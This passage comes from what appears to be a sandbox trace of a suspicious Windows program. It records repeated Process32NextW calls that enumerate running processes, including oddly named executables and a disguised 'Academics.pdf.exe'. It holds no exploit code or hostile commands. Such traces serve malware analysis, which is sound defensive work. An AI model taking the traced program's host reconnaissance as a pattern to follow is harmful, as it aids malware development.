lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.459] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0288.460] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0288.461] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0288.462] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0288.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.463] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.464] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.465] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.466] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.466] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0288.467] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.468] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0288.469] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0288.470] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0288.471] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0288.472] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.472] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0288.473] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0288.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0288.474] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0288.475] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0288.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0288.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0288.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0288.478] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0288.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0288.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0288.480] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0288.481] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0288.481] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0288.482] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0288.483] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0288.484] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0288.485] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0288.486] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0288.486] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.487] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.488] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0288.489] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.490] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0288.491] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.492] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0288.492] CloseHandle (hObject=0x294) returned 1 [0288.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0288.493] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.493] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.493] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0288.495] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.496] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0288.497] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0288.497] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.498] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0288.499] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.500] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0288.501] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0288.502] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0288.503] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0288.503] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.504] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.505] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.506] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.507] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.508] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0288.509] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.510] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.510] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0288.511] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0288.512] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0288.513] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0288.514] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.515] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0288.516] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0288.516] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0288.517] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0288.518] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0288.519] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0288.520] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0288.521] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0288.522] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0288.523] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0288.524] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0288.525] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0288.526] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0288.526] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0288.528] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0288.529] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, 